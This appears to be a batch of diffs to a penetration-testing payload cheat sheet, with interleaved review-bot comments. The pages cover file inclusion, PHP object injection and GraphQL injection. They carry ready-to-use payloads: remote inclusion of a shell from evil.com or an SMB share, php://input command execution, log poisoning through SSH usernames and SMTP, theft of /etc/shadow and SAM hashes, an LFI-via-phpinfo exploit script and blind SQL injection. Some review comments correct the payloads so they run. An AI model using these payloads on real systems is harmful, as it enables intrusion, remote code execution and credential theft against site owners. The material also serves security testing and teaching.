@@ -56,3 +56,7 @@
/var/log/apache/error_log /var/log/apache/error_log
/var/log/httpd/error_log /var/log/httpd/error_log
/var/log/httpd/access_log /var/log/httpd/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log

@@ -765,6 +765,20 @@ php://input
/var/log/mysql/mysql-slow.log /var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log /var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log%00 /var/log/mysql/mysql-slow.log%00
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/access.log
/var/log/nginx/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/error_log
/var/log/nginx/error_log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/var/log/proftpd /var/log/proftpd
/var/log/proftpd /var/log/proftpd
/var/log/proftpd%00 /var/log/proftpd%00
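Review bot: the new nginx entries are duplicated: `/var/log/nginx/access_log` is added three times, `/var/log/nginx/access.log` twice, `/var/log/nginx/error_log` twice and `/var/log/nginx/error.log` three times. The surrounding context already repeats `/var/log/mysql/mysql-slow.log` and `/var/log/proftpd`, so if the duplication mirrors an existing layout say so in the commit; otherwise keep each path once (plus its `%00` variant, as the neighbours do).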

@@ -41,6 +41,10 @@
/var/log/httpd/error_log%00 /var/log/httpd/error_log%00
/var/log/httpd/access_log%00 /var/log/httpd/access_log%00
/var/log/httpd/error_log%00 /var/log/httpd/error_log%00
/var/log/nginx/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/apache/logs/error.log%00 /apache/logs/error.log%00
/apache/logs/access.log%00 /apache/logs/access.log%00
/apache/logs/error.log%00 /apache/logs/error.log%00

@@ -4,3 +4,5 @@
/var/log/apache2/error_log /var/log/apache2/error_log
/var/log/apache2/access_log /var/log/apache2/access_log
/usr/local/nginx/conf/nginx.conf /usr/local/nginx/conf/nginx.conf
/var/log/nginx/error_log
/var/log/nginx/access_log

@@ -11,3 +11,4 @@ wp-admin.php
/inc/mysql.php /inc/mysql.php
/sites/defaults/settings.php /sites/defaults/settings.php
/phpmyadmin/changelog.php /phpmyadmin/changelog.php
web.config

@@ -1,13 +1,21 @@
# Local/Remote File Inclusion # File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. > The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
> The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application
## Summary ## Summary
* [Tools](#tools)
* [Basic LFI](#basic-lfi) * [Basic LFI](#basic-lfi)
* [Null byte](#null-byte)
* [Double encoding](#double-encoding)
* [UTF-8 encoding](#utf-8-encoding)
* [Path and dot truncation](#path-and-dot-truncation)
* [Filter bypass tricks](#filter-bypass-tricks)
* [Basic RFI](#basic-rfi) * [Basic RFI](#basic-rfi)
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
* [Wrapper php://filter](l#wrapper-phpfilter) * [Wrapper php://filter](#wrapper-phpfilter)
* [Wrapper zip://](#wrapper-zip) * [Wrapper zip://](#wrapper-zip)
* [Wrapper data://](#wrapper-data) * [Wrapper data://](#wrapper-data)
* [Wrapper expect://](#wrapper-expect) * [Wrapper expect://](#wrapper-expect)
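Review bot: the two new blockquotes are not parallel. The first keeps `a "dynamic file inclusion" mechanisms` (singular article, plural noun) and the second ends without a period; suggest `a "dynamic file inclusion" mechanism` and `implemented in the target application.` The `l#wrapper-phpfilter` → `#wrapper-phpfilter` anchor fix is correct.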
@@ -20,94 +28,56 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
* [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
* [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files)
Linux - Interesting files to check out : ## Tools
```powershell * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus)
/etc/issue * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite)
/etc/passwd * [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
```
Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
```powershell
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
```
The following log files are controllable and can be included with an evil payload to achieve a command execution
```powershell
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
```
## Basic LFI ## Basic LFI
In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.
```powershell ```powershell
http://example.com/index.php?page=../../../etc/passwd http://example.com/index.php?page=../../../etc/passwd
``` ```
Null byte ### Null byte
:warning: In versions of PHP below 5.3 we can terminate with null byte.
```powershell ```powershell
http://example.com/index.php?page=../../../etc/passwd%00 http://example.com/index.php?page=../../../etc/passwd%00
``` ```
Double encoding ### Double encoding
```powershell ```powershell
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
``` ```
Path truncation ### UTF-8 encoding
```powershell ```powershell
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\. http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
``` ```
Filter bypass tricks ### Path and dot truncation
On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
```powershell
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
```
### Filter bypass tricks
```powershell ```powershell
http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=....//....//etc/passwd
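Review bot: the Summary link `(#lfi-o-rce-via-credentials-files)` is missing a `t`; the heading `## LFI to RCE via credentials files` slugs to `#lfi-to-rce-via-credentials-files`. The cross-reference "check the `Directory & Path Traversal` chapter" does not match the new page's title `# Directory traversal`; use the same name or a relative link. The null-byte warning "In versions of PHP below 5.3 we can terminate with null byte" would be more useful with the exact release that started rejecting null bytes in include paths, because readers use it to decide whether the `%00` variants elsewhere on the page (`/etc/passwd%00`, `php://input%00`) still apply to their target.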
@@ -117,22 +87,33 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
## Basic RFI ## Basic RFI
Most of the filter bypasses from LFI section can be reused for RFI.
```powershell ```powershell
http://example.com/index.php?page=http://evil.com/shell.txt http://example.com/index.php?page=http://evil.com/shell.txt
``` ```
Null byte ### Null byte
```powershell ```powershell
http://example.com/index.php?page=http://evil.com/shell.txt%00 http://example.com/index.php?page=http://evil.com/shell.txt%00
``` ```
Double encoding ### Double encoding
```powershell ```powershell
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
``` ```
### Bypass allow_url_include
When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol.
1. Create a share open to everyone
2. Write a PHP code inside a file : `shell.php`
3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`
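Review bot: "When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box" is a sentence fragment; join it with a comma and write "on a Windows host". The steps imply a precondition worth stating: the target must be able to open `\\10.0.0.1\share\shell.php` over SMB, so the include only works when outbound SMB from the web server is allowed, which is also the control a defender applies here.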
## LFI / RFI using wrappers ## LFI / RFI using wrappers
### Wrapper php://filter ### Wrapper php://filter
@@ -151,7 +132,12 @@ can be chained with a compression wrapper for large files.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
``` ```
NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
```powershell
./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page
curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
```
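Review bot: the two commands added after the NOTE say nothing about what each one does; a comment per line helps (`# Kadimus: dump index.php through the php://filter wrapper` / `# manual equivalent with curl`). The `curl ... | base64 -d > index.php` pipeline also assumes the response body is only the base64 blob; when the template wraps it in HTML, `base64 -d` fails or writes garbage, so mention extracting the blob first.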
### Wrapper zip:// ### Wrapper zip://
@@ -182,11 +168,16 @@ http://example.com/index.php?page=expect://ls
### Wrapper input:// ### Wrapper input://
Specify your payload in the POST parameters Specify your payload in the POST parameters, this can be done with a simple `curl` command.
```powershell ```powershell
http://example.com/index.php?page=php://input curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v
POST DATA: <? system('id'); ?> ```
Alternatively, Kadimus has a module to automate this attack.
```powershell
./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input
``` ```
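Review bot: both new `php://input` examples append `%00` (`page=php://input%00`), which ties them to the null-byte case that `### Null byte` says only applies to old PHP; the wrapper itself does not need it, so drop `%00` or explain when it is required. "Specify your payload in the POST parameters, this can be done with a simple `curl` command." is a comma splice; split it. `-k` turns off certificate verification in the curl example; either say why it is there or leave it out of a reference command.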
### Wrapper phar:// ### Wrapper phar://
@@ -290,6 +281,8 @@ Just append your PHP code into the log file by doing a request to the service (A
```powershell ```powershell
http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/mail http://example.com/index.php?page=/var/log/mail
@@ -298,6 +291,49 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log
``` ```
### RCE via SSH
Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`.
```powershell
ssh <?php system($_GET["cmd"]);?>@10.10.10.10
```
Then include the SSH log files inside the Web Application.
```powershell
http://example.com/index.php?page=/var/log/auth.log&cmd=id
```
### RCE via Mail
First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`.
```powershell
root@kali:~# telnet 10.10.10.10. 25
Trying 10.10.10.10....
Connected to 10.10.10.10..
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: mail@example.com
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: <?php echo system($_GET["cmd"]); ?>
data2
.
```
In some cases you can also send the email with the `mail` command line.
```powershell
mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
```
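Review bot: `ssh <?php system($_GET["cmd"]);?>@10.10.10.10` is not shell-safe as written: the local shell treats `<` as a redirection, `$_GET` as a variable, `;` as a separator and `?` as a glob, so the username never reaches sshd intact; quote it (`ssh '<?php system($_GET["cmd"]);?>'@10.10.10.10`). The address `10.10.10.10.` carries a stray trailing dot in both `telnet 10.10.10.10. 25` and `mail -s ... www-data@10.10.10.10. < /dev/null`. The SSH section includes `/var/log/auth.log` while the log list earlier on the page still names `/var/log/sshd.log`; align the two or state that the path depends on the distribution. "using the open SMTP" → "using an open SMTP relay".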
## LFI to RCE via PHP sessions ## LFI to RCE via PHP sessions
Check if the website use PHP Session (PHPSESSID) Check if the website use PHP Session (PHPSESSID)
@@ -326,7 +362,32 @@ Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
``` ```
## Thanks to ## LFI to RCE via credentials files
This method require high privileges inside the application in order to read the sensitive files.
### Windows version
First extract `sam` and `system` files.
```powershell
http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
```
Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique.
### Linux version
First extract `/etc/shadow` files.
```powershell
http://example.com/index.php?page=../../../../../../etc/shadow
```
Then crack the hashes inside in order to login via SSH on the machine.
## References
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
@@ -341,3 +402,5 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/) * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
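Review bot: "This method require high privileges" → "requires"; "First extract `/etc/shadow` files" → "the `/etc/shadow` file". The command `samdump2 SYSTEM SAM > hashes.txt` is embedded in prose; put it in a fence like the others. One sentence on why high privileges are needed would make the section self-explanatory: `/etc/shadow` and `WINDOWS/repair/sam` are not readable by an unprivileged service account, which is exactly why running the web server as such an account is the primary mitigation for this path.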

@@ -1,5 +1,7 @@
#!/usr/bin/python #!/usr/bin/python
# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
from __future__ import print_function
from builtins import range
import sys import sys
import threading import threading
import socket import socket
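Review bot: `from builtins import range` is only available on Python 2 through the third-party `future` package; on Python 3 it resolves to the standard-library module. If the script is still meant to run under Python 2, document the `future` dependency; if the intent is to move to Python 3 only, both this import and `from __future__ import print_function` can go.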
@@ -83,7 +85,7 @@ class ThreadWorker(threading.Thread):
if self.event.is_set(): if self.event.is_set():
break break
if x: if x:
print "\nGot it! Shell created in /tmp/g" print("\nGot it! Shell created in /tmp/g")
self.event.set() self.event.set()
except socket.error: except socket.error:
@@ -110,23 +112,23 @@ def getOffset(host, port, phpinforeq):
if i == -1: if i == -1:
raise ValueError("No php tmp_name in phpinfo output") raise ValueError("No php tmp_name in phpinfo output")
print "found %s at %i" % (d[i:i+10],i) print("found %s at %i" % (d[i:i+10],i))
# padded up a bit # padded up a bit
return i+256 return i+256
def main(): def main():
print "LFI With PHPInfo()" print("LFI With PHPInfo()")
print "-=" * 30 print("-=" * 30)
if len(sys.argv) < 2: if len(sys.argv) < 2:
print "Usage: %s host [port] [threads]" % sys.argv[0] print("Usage: %s host [port] [threads]" % sys.argv[0])
sys.exit(1) sys.exit(1)
try: try:
host = socket.gethostbyname(sys.argv[1]) host = socket.gethostbyname(sys.argv[1])
except socket.error, e: except socket.error as e:
print "Error with hostname %s: %s" % (sys.argv[1], e) print("Error with hostname %s: %s" % (sys.argv[1], e))
sys.exit(1) sys.exit(1)
port=80 port=80
@@ -134,8 +136,8 @@ def main():
port = int(sys.argv[2]) port = int(sys.argv[2])
except IndexError: except IndexError:
pass pass
except ValueError, e: except ValueError as e:
print "Error with port %d: %s" % (sys.argv[2], e) print("Error with port %d: %s" % (sys.argv[2], e))
sys.exit(1) sys.exit(1)
poolsz=10 poolsz=10
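Review bot: `print("Error with port %d: %s" % (sys.argv[2], e))` runs only when `int(sys.argv[2])` has just failed, so `sys.argv[2]` is a non-numeric string and `%d` raises `TypeError` inside the handler, hiding the intended message; use `%s`. The `poolsz` handler below has the same `%d` with `sys.argv[3]`.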
@@ -143,11 +145,11 @@ def main():
poolsz = int(sys.argv[3]) poolsz = int(sys.argv[3])
except IndexError: except IndexError:
pass pass
except ValueError, e: except ValueError as e:
print "Error with poolsz %d: %s" % (sys.argv[3], e) print("Error with poolsz %d: %s" % (sys.argv[3], e))
sys.exit(1) sys.exit(1)
print "Getting initial offset...", print("Getting initial offset...", end=' ')
reqphp, tag, reqlfi = setup(host, port) reqphp, tag, reqlfi = setup(host, port)
offset = getOffset(host, port, reqphp) offset = getOffset(host, port, reqphp)
sys.stdout.flush() sys.stdout.flush()
@@ -156,7 +158,7 @@ def main():
e = threading.Event() e = threading.Event()
l = threading.Lock() l = threading.Lock()
print "Spawning worker pool (%d)..." % poolsz print("Spawning worker pool (%d)..." % poolsz)
sys.stdout.flush() sys.stdout.flush()
tp = [] tp = []
@@ -174,19 +176,19 @@ def main():
sys.stdout.flush() sys.stdout.flush()
if counter >= maxattempts: if counter >= maxattempts:
break break
print print()
if e.is_set(): if e.is_set():
print "Woot! \m/" print("Woot! \m/")
else: else:
print ":(" print(":(")
except KeyboardInterrupt: except KeyboardInterrupt:
print "\nTelling threads to shutdown..." print("\nTelling threads to shutdown...")
e.set() e.set()
print "Shuttin' down..." print("Shuttin' down...")
for t in tp: for t in tp:
t.join() t.join()
if __name__=="__main__": if __name__=="__main__":
print "Don't forget to modify the LFI URL" print("Don't forget to modify the LFI URL")
main() main()
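Review bot: `print("Woot! \m/")` contains the invalid escape `\m`, which Python 3 flags with a warning at compile time; write `"Woot! \\m/"` or a raw string `r"Woot! \m/"`. The rest of the print conversions in this hunk (`print()` for the bare `print`, `end=' '` for the trailing comma) are correct.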

@@ -1,3 +1,5 @@
from __future__ import print_function
from builtins import range
import itertools import itertools
import requests import requests
import string import string

Binary file not shown.

GraphQL Injection/README.md Normal file
@@ -0,0 +1,217 @@
# GraphQL injection
> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type
## Summary
* [Tools](#tools)
* [Exploit](#exploit)
* [Identify an injection point](#identify-an-injection-point)
* [Enumerate Database Schema via Instropection](#enumerate-database-schema-via-introspection)
* [Extract data](#extract-data)
* [Enumerate the types' definition](#enumerate-the-type-definition)
* [Use mutations](#use-mutations)
* [NOSQL injection](#nosql-injection)
* [SQL injection](#sql-injection)
* [References](#references)
## Tools
* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
* [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
## Exploit
### Identify an injection point
Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
```js
example.com/graphql?query={__schema{types{name}}}
example.com/graphiql?query={__schema{types{name}}}
```
Check if errors are visible.
```javascript
?query={__schema}
?query={}
?query={thisdefinitelydoesnotexist}
```
### Enumerate Database Schema via Introspection
URL encoded query to dump the database schema.
```js
fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
```
URL decoded query to dump the database schema.
```javascript
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
```
### Extract data
```js
example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
```
![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
### Enumerate the types' definition
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
```javascript
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
```
### Use mutations
Mutations work like function, you can use them to interact with the GraphQL.
```javascript
# mutation{signIn(login:"Admin", password:"secretp@ssw0rd"){token}}
# mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}
```
### NOSQL injection
Use `$regex`, `$ne` from []() inside a `search` parameter.
```json
{
doctors(
options: "{\"limit\": 1, \"patients.ssn\" :1}",
search: "{ \"patients.ssn\": { \"$regex\": \".*\"}, \"lastName\":\"Admin\" }")
{
firstName lastName id patients{ssn}
}
}
```
### SQL injection
Simple SQL injection inside a graphql field.
```powershell
curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27
```
## References
* [Introduction to GraphQL](https://graphql.org/learn/)
* [GraphQL Introspection](https://graphql.org/learn/introspection/)
* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
* [GraphQL abuse: Bypass account level permissions through parameter smuggling - March 14, 2018 - @Detectify](https://labs.detectify.com/2018/03/14/graphql-abuse/)
* [Discovering GraphQL endpoints and SQLi vulnerabilities - Sep 23, 2018 - Matías Choren](https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
* [Securing Your GraphQL API from Malicious Queries - Feb 21, 2018 - Max Stoiber](https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
* [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/)
* [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066)
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
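Review bot: the `$regex`, `$ne` sentence under `### NOSQL injection` contains an empty markdown link `[]()` that renders as a dead link; either point it at the MongoDB query-operator reference or drop the brackets. Two smaller points in the same hunk: "Mutations work like function" should read "Mutations work like functions", and the `### SQL injection` example only shows the URL-encoded `curl`; placing the decoded payload `1';SELECT 1;SELECT pg_sleep(30);--'` next to it would make clear that this is a stacked-query, time-based PostgreSQL probe (the 30-second delay is the signal), which is what the `embedded_submission_form_uuid` HackerOne report in the references describes.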

View File

@@ -63,7 +63,7 @@ JRE8u20_RCE_Gadget
JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss) JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
## Thanks to ## References
- [Github - ysoserial](https://github.com/frohoff/ysoserial) - [Github - ysoserial](https://github.com/frohoff/ysoserial)
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)

View File

@@ -1,10 +1,16 @@
# PHP Object Injection # PHP Object injection
PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
Also you should check the `Wrapper Phar://` in [File Inclusion - Path Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-phar) which use a PHP object injection. The following magic methods will help you for a PHP Object injection
## Exploit with the __wakeup in the unserialize function * __wakeup() when an object is unserialized.
* __destruct() when an object is deleted.
* __toString() when an object is converted to a string.
Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection.
## __wakeup in the unserialize function
Vulnerable code: Vulnerable code:
